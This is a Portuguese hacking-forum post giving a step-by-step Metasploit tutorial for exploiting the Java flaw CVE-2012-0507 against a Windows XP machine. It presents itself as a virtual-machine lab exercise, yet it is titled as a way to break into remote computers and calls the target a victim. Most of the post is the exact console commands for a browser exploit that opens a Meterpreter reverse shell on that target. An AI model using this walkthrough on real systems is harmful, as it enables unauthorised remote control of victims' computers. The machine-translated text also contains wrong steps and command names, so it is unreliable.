seja bem vindo ao forum eof, caso nao seja cadastrado se cadastre para poder visualizar todo o conteudo ^^

Participe do fórum, é rápido e fácil

seja bem vindo ao forum eof, caso nao seja cadastrado se cadastre para poder visualizar todo o conteudo ^^
Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.

Você não está conectado. Conecte-se ou registre-se

Invadindo computador remoto por vulnerabilidade no java com metasploit

Ir para baixo  Mensagem [Página 1 de 1]

MysteryMind

MysteryMind
avançado
avançado

Créditos: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Edição:Ice Mike

Requisitos:
Vmware Player com windows xp em modo bridge
Distro de Pentest (Backtrack,Backbox,Bugtraq a escolha é sua)
JRE 6 (versão sem patch)

CVE-2012-0507 é uma vulnerabilidade no JRE, devido ao fato de que a implementação da classe AtomicReferenceArray não verificar corretamente se a matriz é de um objeto esperado [tipo]. Um aplicativo Java malicioso ou applet poderia usar esta falha para causar Java Virtual Machine (JVM) para travar ou ignorar as restrições de Java sandbox.

Notícias sobre segurança: Essa vulnerabilidade afeta o Windows, Mac e Linux. No mês passado, malware Flashback infectar mais de 600 mil computadores Mac , explorando essa vulnerabilidade. Recentemente, o INSS , The Amnesty International UK sites injetado com código malicioso, que exploram a CVE-2012-0507.
Eu estou indo para demonstrar esta vulnerabilidade com o VirtualBox. Eu tenho a configuração duas máquinas virtuais ou seja, "Destino" e "BT5". Eu instalei o XP 2 no Target e R2 Backtrack 5 no 'BT5'.

(? Precisam de ajuda para configurar o VM, leia isto: Laboratório de configuração PenTesting ).

Parte I: Preparando o computador de destino:
Inicie o "alvo" da máquina.
Instalar o JRE 6.

Parte II: Preparação da máquina PenTesting:
Agora, começar a BT5.

Abra o terminal e digite "msfupdate". Isto irá atualizar o Metasploit Framework (MSF) com as últimas façanhas e cargas úteis. Como CVE-2012-0507 é o mais recente vulnerabilidade, você tem que atualizar o MSF antes de prosseguir.

Parte III:
Explorando o Java AtomicReferenceArray Vulnerabilidade Violação Tipo:


Etapa 1:
Abra o Terminal e "msfconsole" tipo. Isto irá trazer o console Metasploit, aqui você pode interagir com o MSF.

Etapa 2:
Tipo "use exploit/multi/browser/java_atomicreferencearray". Este comando irá usar o módulo java_atomicreferencearray.rb para o ataque.

Agora digite "show options" para mostrar as configurações que estão disponíveis e / ou necessários para este módulo específico.

Agora digite "set SRVPORT 80".
e "set URIPATH /".

Passo 3: Carga Set
Escolhendo PAYLOAD
set payload java/meterpreter/reverse_tcp

Passo 4:definindo LHOST
ABRA O TERMINAL DIGITE ifconfig olhe em inet adress seu ip
agora volte ao terminal do metasploit e digite
set LHOST meuip

Parte 5:invadindo a maquina

Digite "exploit" no msfconsole. Isto irá iniciar o manipulador inversa à nossa máquina e que vai esperar alguém que vai ligar para o servidor HTTP nosso (Ex: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] Uma vez vítima ligar para o nosso servidor, ele irá enviar um frasco que vai explorar a vulnerabilidade CVE-2012-0507.

Abra o Firefox / IE na máquina de destino.
Digite "http://ip da vitima".
Ele carrega nada, mas exploit será executado em segundo plano.

agora no backtrack 5 ja deve ter aprecido Meterpreter session opened

agora ainda no metasploit digite
session -i 1

pronto agora o console estara assim

Meterpreter>
apenas digite os comandos que voce realizara as açoes do cmd no alvo
exemplo:dir
isso iria mostrar as pastas

Espero que tenham gostado pessoal deu um trabalho editar isso pq tava meio errado o tutorial intao tive q consertar
é isso ai flws galera

Ir para o topo  Mensagem [Página 1 de 1]

Permissões neste sub-fórum
Não podes responder a tópicos